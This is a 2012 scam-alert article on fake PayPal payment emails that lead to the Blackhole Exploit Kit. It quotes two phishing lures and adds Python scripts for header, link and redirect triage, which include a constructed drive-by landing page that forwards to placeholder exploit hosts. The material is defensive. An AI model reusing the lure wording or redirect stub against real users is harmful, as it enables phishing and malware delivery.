Issue 133 - June 2012 (2nd Edition) - Page 16

Paypal 'You Sent a Payment' Malware Emails


Outline
Emails purporting to be from Paypal claim that the recipient has sent a payment to a person or vendor. The recipient is instructed to click a link to view or confirm transaction details.



Brief Analysis
The emails are not from Paypal, and the claim that a payment has been sent from the recipient's account is a lie. Links in the emails open compromised websites that redirect the visitor to pages hosting the Blackhole Exploit Kit, which attempts to install information-stealing malware on the visitor's computer.






Last updated: 30th May 2012
First published: 30th May 2012
Article written by Brett M. Christensen


Examples
Subject: You've sent a payment

You sent a payment
Transaction ID: 4BK71319AT361831A

Dear PayPal Customer,
You sent a payment for 931.09 AUD to Ray [Surname Removed].

Please note that it may take a little while for your payment to appear in the Recent Activity list on your Account Overview. View the details of this transaction online

Your monthly account statement is available anytime; just log in to your account at [link removed]. To correct any errors, please contact us through our Help Centre at
[Link Removed]

Amount: 931.09 AUD
Sent on: 30 May 2012
Payment method Credit Card Payment
Kind regards,
PayPal

[Screenshot: Paypal Malware Email 1]


Subject: Receipt for your payment to AVG

Hello Member,

You sent a payment of 90.00 USD to AVG.

This charge will appear on your credit card statement as payment to PAYPAL *AVGANTS

Seller AVG Technologies

Note to seller You haven't included a note

Description              Unit price    Qty    Amount
AVG Anti-Virus 2012      45.00 USD     2      45.00 USD
Shipping and handling                         0.00 USD
Tax                                           0.00 USD

Total                                         90.00 USD

________________________________________
Do you confirm this payment?
If this payment was not made by you please immediately take the following steps:

* Login to your account by clicking on the link below :
* Provide requested information to ensure you are the owner of the account
* After you did the previous steps the order will be cancelled.
* We will refund your money to you and the payment will deleted from transactions history.

CANCEL TRANSACTION!

[Screenshot: Paypal Malware Email 2]




Detailed Analysis
According to these fraudulent emails, the recipient has recently sent a substantial payment via his or her Paypal account. Details in the scam emails vary, with some claiming that the money has been sent to purchase software or other items while others claim that the money has been sent directly to a named individual.

The messages are designed to look like genuine Paypal emails and include seemingly genuine Paypal logos and formatting. The From address is spoofed so that the messages appear to have been sent from paypal.com, even though they originate elsewhere.
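The spoofed sender and the disguised links in messages like the two quoted above can be checked mechanically rather than by eye. The following Python script is an added example, not part of the original article or any PayPal tooling: it parses a constructed message modelled on the lure, compares the visible From domain with the envelope sender (Return-Path) and with the SPF result the receiving mail server recorded in Authentication-Results, and flags every link that does not lead to paypal.com, including anchors whose visible text shows a paypal.com address while the href goes somewhere else. The sample headers, the Authentication-Results line and all hostnames (under the reserved .invalid TLD) are constructed for the demonstration.

```python
"""Triage a suspected payment-notification lure: does the message authenticate
as the brand it claims, and do its links actually lead there?
Added example, not the article's own code; the sample message is constructed."""
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

CLAIMED_DOMAIN = "paypal.com"  # brand the lure impersonates (assumed for the demo)

# Constructed sample modelled on the quoted email: spoofed From header, failing
# SPF, and links whose visible text does not match where they really go.
SAMPLE_EML = """\
Return-Path: <bounce@bulk-sender.invalid>
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=bulk-sender.invalid
From: "PayPal" <service@paypal.com>
To: customer@example.net
Subject: You've sent a payment
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear PayPal Customer, you sent a payment for 931.09 AUD.</p>
<p><a href="http://compromised-site.invalid/paypal/view.html">View the details of this transaction online</a></p>
<p>Log in at <a href="http://compromised-site.invalid/login">https://www.paypal.com/</a></p>
<p><a href="https://www.paypal.com/help">Help Centre</a></p>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def same_org(host, domain):
    """True if host is domain itself or a subdomain of it (www.paypal.com -> paypal.com)."""
    host = (host or "").lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def header_findings(msg):
    """Compare the visible From domain with the envelope sender and the SPF verdict."""
    findings = []
    from_domain = parseaddr(str(msg["From"]))[1].rpartition("@")[2].lower()
    env_domain = parseaddr(str(msg.get("Return-Path", "")))[1].rpartition("@")[2].lower()
    if env_domain and not same_org(env_domain, from_domain):
        findings.append(("envelope_mismatch", f"From {from_domain} but Return-Path {env_domain}"))
    auth = str(msg.get("Authentication-Results", ""))
    spf = re.search(r"\bspf=(\w+)", auth)
    if spf and spf.group(1).lower() != "pass":
        findings.append(("spf_fail", f"SPF result '{spf.group(1)}' for a From claiming {from_domain}"))
    return findings


def link_findings(html, claimed=CLAIMED_DOMAIN):
    """Flag links that leave the claimed brand, and anchors whose text hides that."""
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for href, text in collector.links:
        host = urlparse(href).hostname
        if not same_org(host, claimed):
            findings.append(("off_brand_link", f"{text!r} -> {href}"))
            # The classic lure: the anchor text shows the real brand's address.
            if claimed in text.lower():
                findings.append(("text_href_mismatch", f"shows {text!r}, goes to {host}"))
    return findings


def triage(raw, claimed=CLAIMED_DOMAIN):
    """Parse a raw RFC 5322 message and return every finding as a (kind, detail) pair."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    html = body.get_content() if body is not None else ""
    return header_findings(msg) + link_findings(html, claimed)


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_EML):
        print(f"{kind:20} {detail}")
```

To run it on a real message, replace SAMPLE_EML with the contents of a saved .eml file. A clean result is not proof of legitimacy: a lure sent through a compromised mailbox at the genuine domain passes SPF, and the link check sees only the first hop, not the redirect that follows it.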

However, the emails are not from Paypal, and the claims that the recipient has sent a payment via Paypal are untrue. Every link in the bogus emails instead opens a page on a compromised website that asks the user to wait while the page finishes loading. No Paypal page ever loads. The stub page automatically redirects the visitor to a second website that hosts a version of the Blackhole Exploit Kit. Blackhole is a web application used by criminals to probe a visitor's browser and its plugins for unpatched vulnerabilities and, where one is found, to silently download and install trojans and other types of malware.
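The "please wait" stub page described above forwards the visitor by page-level mechanisms that can be read off the HTML without rendering it in a browser. The script below is an added example (not the article's code, and it does not emulate Blackhole itself): it pulls the onward destinations out of a constructed landing page that uses a meta refresh, a JavaScript location assignment and a hidden iframe, so that the hostnames in the redirect chain can be looked up or blocked. All hostnames in the sample are invented (under the reserved .invalid TLD).

```python
"""Extract the onward destinations from a 'please wait' landing page so the
redirect chain can be followed and blocked without rendering the page.
Added example, not from the article; the sample page is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the behaviour described above: a stub page that
# tells the visitor to wait, then forwards them by several mechanisms at once.
SAMPLE_PAGE = """\
<html><head>
<meta http-equiv="refresh" content="3; URL=http://redirector.invalid/go.php?id=1">
<script type="text/javascript">
  setTimeout(function(){ window.location.href = "http://exploit-host.invalid/main.php?page=4a1b"; }, 2000);
</script>
</head><body>
<h2>Please wait while the page is loading...</h2>
<iframe src="http://exploit-host.invalid/frame.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""

# Plain (unobfuscated) JavaScript redirect idioms.
JS_LOCATION = re.compile(
    r"""(?:window|document|top|self|parent)?\.?location(?:\.href)?\s*=\s*["']([^"']+)["']"""
)
JS_REPLACE = re.compile(r"""location\.replace\(\s*["']([^"']+)["']\s*\)""")


def _refresh_url(content):
    """Pull the URL out of a meta refresh value such as '3; URL=http://...'."""
    for part in content.split(";"):
        part = part.strip()
        if part.lower().startswith("url="):
            return part[4:].strip().strip("'\"")
    return None


def _looks_hidden(attrs):
    """Hidden or 1x1 iframes are the usual way a drive-by page pulls in the exploit."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        return int(attrs.get("width", "100")) <= 1 or int(attrs.get("height", "100")) <= 1
    except ValueError:
        return False


class RedirectFinder(HTMLParser):
    """Record every (mechanism, url) by which the page sends the visitor onward."""
    def __init__(self):
        super().__init__()
        self.targets = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            url = _refresh_url(a.get("content", ""))
            if url:
                self.targets.append(("meta-refresh", url))
        elif tag == "iframe":
            src = a.get("src", "")
            if src and _looks_hidden(a):
                self.targets.append(("hidden-iframe", src))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies verbatim, so scan them for redirects.
        if self._in_script:
            for pattern in (JS_LOCATION, JS_REPLACE):
                for m in pattern.finditer(data):
                    self.targets.append(("js-location", m.group(1)))


def extract_redirects(html):
    """Return [(mechanism, url), ...] in document order."""
    finder = RedirectFinder()
    finder.feed(html)
    finder.close()
    return finder.targets


def destination_hosts(html):
    """Sorted, de-duplicated hostnames the page forwards to (for blocklists / lookups)."""
    hosts = {urlparse(u).hostname for _, u in extract_redirects(html)}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    for mechanism, url in extract_redirects(SAMPLE_PAGE):
        print(f"{mechanism:14} {url}")
    print("hosts:", destination_hosts(SAMPLE_PAGE))
```

Real exploit-kit landing pages usually obfuscate the redirect script (building the URL from escaped or concatenated strings), so a static scan like this finds only the plain cases; fetching the page in a sandboxed, instrumented browser and recording the requests it makes is the reliable way to walk the full chain.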

The criminals responsible for this operation hope that at least a few recipients will be panicked into clicking the links in the bogus emails in the mistaken belief that their Paypal account or credit card has been compromised. If a recipient does fall for the ruse and follows one of the links, a trojan may be downloaded and installed on his or her computer. Such a trojan may monitor web browser use, collect usernames and passwords, including online banking login details, and send this information back to the criminals.

Online criminals have recently carried out a number of similar attacks with the aim of fooling users into visiting websites that host the BlackHole Exploit Kit. At the time of writing, bogus Verizon Wireless bills that lead to Blackhole Exploit Kit sites continue to be distributed. Earlier in 2012, a series of malware emails purporting to be airline flight confirmation messages again pointed recipients to compromised sites that harboured BlackHole. And, in December 2011, fake Amazon.com order notifications were distributed that also contained links to BlackHole websites.

BlackHole is a widely used criminal toolkit and such attacks are likely to continue. Be very cautious of clicking links in emails, even if they appear to be legitimate. Some such attacks are quite sophisticated, and it may be difficult, at least without careful examination, to tell the difference between a bogus email and a genuine notification. Rather than click on email links, it is safer to open your browser, go to the service provider's website directly by typing in the web address, and check your account activity there. And, of course, always ensure that you have installed the latest security updates for your operating system, browser and browser plugins, and that you have up-to-date antivirus and anti-malware protection on your computer.


References
BlackHole Exploit Kit
PayPal Payment Notification leads to Blackhole Exploit Kit
Bogus Verizon Wireless Bill Email Points to Malware
US Airways 'Flight Confirmation' Malware Emails
Bogus Amazon Shipping Confirmation Emails Point To Malware
